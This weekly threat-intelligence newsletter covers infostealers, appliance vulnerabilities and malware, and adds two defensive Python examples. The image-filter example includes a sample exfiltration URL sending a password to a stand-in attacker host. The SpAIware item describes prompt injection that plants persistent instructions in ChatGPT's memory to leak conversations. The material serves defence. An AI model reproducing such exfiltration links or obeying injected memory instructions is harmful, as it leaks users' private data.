Threat Intel: Thursday, September 26

Welcome to this week’s Threat Intelligence Roundup! Each week we cover the latest on emerging threats, trends, and top security practices, all tailored just for you.

Threat Intel Thursdays are designed to give you a wider perspective and arm you with the knowledge you need to make smart security decisions.

Threat Intelligence Email Blasts This Week:

Infostealer Malware Bypassing Chrome’s New Cookie-theft Defenses Security researchers have identified infostealer variants that bypass the cookie-theft defense Google shipped in Chrome 127 for Windows, App-Bound Encryption, which ties decryption of the stored cookie database to a privileged Chrome service so that malware running as the logged-in user can no longer decrypt the file directly. Attackers adapted within weeks: rather than reading the cookie database off disk, the new variants harvest session cookies from the running browser, for example by reading them out of Chrome’s process memory after Chrome has decrypted them for its own use, or by other in-process techniques. The defense still raises the bar, but it does not remove the need for endpoint detection of processes that read browser memory, short session lifetimes, and prompt session revocation when a host is found to be infected. It is also a reminder that teams should continue to focus on strong password management and avoid storing passwords in the browser, while recognizing that a stolen session cookie hands an attacker the logged-in session without the password ever being needed.
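Because the new variants scrape cookies from the browser process rather than from the cookie database, one detection angle is the handle a foreign process opens on chrome.exe. The following is an added example (not code from the roundup or from any vendor) that models Sysmon Event ID 10 (ProcessAccess) records as dictionaries and flags any non-allow-listed source image that obtains PROCESS_VM_READ on a Chromium browser; the sample events and the allow-list are constructed for illustration and must be tuned to the environment.

```python
"""Added example: flag processes that open a Chromium browser with memory-read
rights, the access pattern used by infostealers that read decrypted cookies
out of browser memory. Event fields follow Sysmon Event ID 10 (ProcessAccess);
the events and the allow-list below are constructed, not real telemetry."""

# Standard Windows process access rights (winnt.h)
PROCESS_VM_READ = 0x0010
PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000

# Hypothetical allow-list of images expected to open browser memory
# (the browser's own processes, the OS, the EDR agent). Extend per environment.
ALLOWED_SOURCES = {
    r"c:\program files\google\chrome\application\chrome.exe",
    r"c:\windows\system32\csrss.exe",
}

# Chromium-based browsers that store cookies the same way
BROWSER_TARGETS = ("\\chrome.exe", "\\msedge.exe", "\\brave.exe")


def is_suspicious_access(event: dict) -> bool:
    """True when a non-allow-listed process opens a Chromium browser process
    with a handle whose granted access includes PROCESS_VM_READ."""
    target = event["TargetImage"].lower()
    source = event["SourceImage"].lower()
    if not target.endswith(BROWSER_TARGETS):
        return False
    if source in ALLOWED_SOURCES:
        return False
    granted = int(event["GrantedAccess"], 16)  # Sysmon logs the mask as hex text
    return bool(granted & PROCESS_VM_READ)


def find_suspicious(events):
    """Return the subset of events that warrant an alert."""
    return [e for e in events if is_suspicious_access(e)]


# Constructed sample: one memory scraper, one legitimate Chrome child-process
# open, and one benign Task Manager query that carries no read right.
SAMPLE_EVENTS = [
    {"SourceImage": r"C:\Users\alice\AppData\Local\Temp\updater.exe",
     "TargetImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "GrantedAccess": "0x1410"},   # VM_READ | QUERY_INFORMATION | QUERY_LIMITED
    {"SourceImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "TargetImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "GrantedAccess": "0x1FFFFF"}, # Chrome opening its own renderer
    {"SourceImage": r"C:\Windows\System32\taskmgr.exe",
     "TargetImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "GrantedAccess": "0x1000"},   # QUERY_LIMITED_INFORMATION only
]

if __name__ == "__main__":
    for e in find_suspicious(SAMPLE_EVENTS):
        print("ALERT", e["SourceImage"], "->", e["TargetImage"], e["GrantedAccess"])
```

ProcessAccess events are only emitted if the Sysmon configuration includes a ProcessAccess rule for the browser images, and the rule is noisy on hosts with backup agents or crash reporters, so expect to grow the allow-list before paging on it; commercial EDRs expose the same signal natively.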

HPE Aruba Fixes Severe Flaws in Access Points HPE Aruba Networking has patched three critical vulnerabilities, tracked as CVE-2024-42505, CVE-2024-42506, and CVE-2024-42507 (CVSS 9.8), in its access points running Instant AOS-8 and AOS-10. All three are unauthenticated command-injection flaws in the command-line interface service, reachable by sending crafted packets to the PAPI access-point management protocol on UDP port 8211, and successful exploitation yields arbitrary command execution as a privileged user on the device. Because an access point sits on the network edge and handles every wireless client, a compromised unit is a foothold for sniffing, credential capture and lateral movement, so immediate patching is essential. HPE advises installing the fixed releases on affected devices; as interim mitigations, Instant AOS-8 deployments can enable cluster security, and AOS-10 deployments should block access to UDP port 8211 from all untrusted networks.

This Week’s Roundup:

ESET Fixes Two Privilege Escalation Vulnerabilities ESET has patched two local privilege escalation vulnerabilities, including CVE-2024-7400, which carries a CVSS score of 7.3. These flaws could allow an attacker who already has low-privileged access to a system to abuse the security product’s own privileged file operations and gain elevated rights, bypassing user restrictions and performing administrative actions. Local privilege escalation bugs in endpoint security agents are a frequent post-exploitation step because the agent runs with high privileges on every host, so it is critical that teams apply ESET’s most recent update.

Kaspersky Removes Itself, Installs UltraAV Antivirus With No Prompt Kaspersky users in the US were alarmed when the antivirus uninstalled itself and installed UltraAV in its place without any notification or prior warning. The lack of communication raised concerns about transparency and user control: an unexpected replacement of security software leaves administrators unsure what protection is actually running, and an unprompted silent install of a new agent is exactly the behaviour teams should be alerting on. Organizations with affected endpoints should verify what is now installed and whether it meets their policy before treating those hosts as covered.

ChatGPT for macOS Enabled Long-Term Spyware via Memory OpenAI has patched a vulnerability in the ChatGPT app for macOS that allowed an attacker to plant persistent instructions in the assistant’s Memory feature. The technique, named SpAIware by the researcher who reported it, works by indirect prompt injection: content the user asks ChatGPT to process (for example a web page) instructs the model to store attacker-controlled directions in long-term memory, after which every later conversation, including what the user types and the model’s responses, is exfiltrated to the attacker. The patch closes the exfiltration channel, but memories already injected remain until the user removes them, so teams are advised to update immediately and to review the stored memories in the app’s settings.
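Persistent prompt-injection attacks of the SpAIware type typically exfiltrate by getting the client to render an image whose URL carries the conversation text in its query string. The following is an added example (not OpenAI’s code or the researcher’s) of a client-side filter that refuses to render markdown images unless the host is on an allow-list and the URL carries no query or fragment; the allowed host and the sample model output are hypothetical.

```python
"""Added example: block markdown image links in model output that could act
as an exfiltration channel. Allow-listed host and sample output are
hypothetical; the filter is one layer, it does not remove injected memories."""
import re
from urllib.parse import urlsplit

# Markdown image syntax: ![alt](url "optional title")
IMAGE_MD = re.compile(r"!\[([^\]]*)\]\(([^)\s]+)(?:\s+\"[^\"]*\")?\)")

# Hypothetical: only the application's own file host may serve inline images
ALLOWED_IMAGE_HOSTS = {"files.example.com"}


def url_is_safe(url: str, allowed_hosts=ALLOWED_IMAGE_HOSTS) -> bool:
    """Accept only https URLs on an allow-listed host with no query string or
    fragment, so the URL cannot smuggle conversation data to the server."""
    parts = urlsplit(url)
    if parts.scheme != "https":
        return False
    if parts.hostname is None or parts.hostname.lower() not in allowed_hosts:
        return False
    return not (parts.query or parts.fragment)


def sanitize_output(text: str):
    """Replace unsafe image links with a placeholder.
    Returns (clean_text, list_of_blocked_urls) so the caller can log attempts."""
    blocked = []

    def repl(match):
        alt, url = match.group(1), match.group(2)
        if url_is_safe(url):
            return match.group(0)
        blocked.append(url)
        return f"[image blocked: {alt or 'untrusted source'}]"

    return IMAGE_MD.sub(repl, text), blocked


# Constructed model output: one exfiltration attempt, one legitimate image
SAMPLE_OUTPUT = (
    "Here is the summary you asked for.\n"
    "![](https://evil.example.net/c?d=user%20said%3A%20my%20password%20is%20hunter2)\n"
    "![diagram](https://files.example.com/diagram.png)\n"
)

if __name__ == "__main__":
    clean, blocked = sanitize_output(SAMPLE_OUTPUT)
    print(clean)
    for url in blocked:
        print("blocked exfil attempt:", url)
```

A filter like this only closes the image channel; links the user is persuaded to click, and the injected memory entries themselves, still need separate handling, which is why reviewing stored memories after the update matters.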

Severe Ivanti vTM Auth Bypass Now Exploited A critical authentication bypass in Ivanti Virtual Traffic Manager (vTM), tracked as CVE-2024-7593 (CVSS 9.8), is now being actively exploited and has been added to CISA’s Known Exploited Vulnerabilities catalog. The flaw stems from an incorrect implementation of the admin panel’s authentication logic and allows a remote, unauthenticated attacker to bypass authentication and create an administrator account, giving full control over the affected appliance; public proof-of-concept exploit code is available. Organizations running vTM should apply Ivanti’s fixed releases immediately and, in line with Ivanti’s guidance, ensure the management interface is bound to an internal network or otherwise restricted to trusted addresses rather than exposed to the internet, then audit the appliance for administrator accounts they did not create.

Generative AI Malware Now Used in Phishing Attacks While investigating a malicious email, HP researchers found a VBScript and JavaScript dropper used to deliver AsyncRAT whose structure, variable naming and line-by-line comments strongly suggest it was written with the help of a generative AI model. Analysis of the code indicates that threat actors are now using AI to produce working malicious code, something that until now had rarely been observed in the wild. The case shows how generative AI lowers the skill and effort needed to develop malware; since AI-written droppers are still delivered through the same phishing and script-execution paths, it reinforces the value of layered controls such as mail filtering, script-execution restrictions and endpoint detection.

Necro Android Malware Found in Popular Apps on Google Play Security researchers have discovered the Necro Android malware hidden in several popular apps on the Google Play Store, including a camera app and a browser with millions of downloads, as well as in modified versions of well-known apps distributed outside the store. Necro is a loader: once installed it can steal sensitive data, execute commands sent by its operators, and download and install additional malicious modules on the infected device. Organizations are strongly urged to check managed and BYOD devices for the affected apps and remove them immediately, keeping in mind that removing the carrier app does not necessarily remove modules the loader has already fetched.
